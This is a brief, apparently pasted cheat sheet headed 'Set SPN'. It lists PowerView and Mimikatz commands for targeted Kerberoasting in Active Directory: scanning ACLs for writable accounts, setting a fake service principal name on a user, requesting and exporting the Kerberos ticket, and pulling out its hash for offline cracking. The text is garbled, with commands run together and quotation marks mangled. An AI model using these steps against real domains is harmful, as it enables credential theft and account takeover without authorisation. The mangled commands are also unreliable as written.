Set SPN
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match β<groupname>β}
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match β<groupname>β} | select IdentityReference, ObjectDN, ActiveDirectoryRights | fl. ./Powerview_dev.ps1
Get-DomainUser -Identity <username> | select samaccountname, serviceprincipalnameGet-NetUser | Where-Object {$_.servicePrincipalName}. ./PowerView_dev.ps1
Set-DomainObject -Identity <username> -Set @{serviceprincipalname=βops/whatever1β}Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ops/whatever1"Invoke-Mimikatz -Command '"Kerberos::list /export"'Get-DomainUser -Identity <username> | Get-DomainSPNTicket | select -ExpandProperty HashLast updated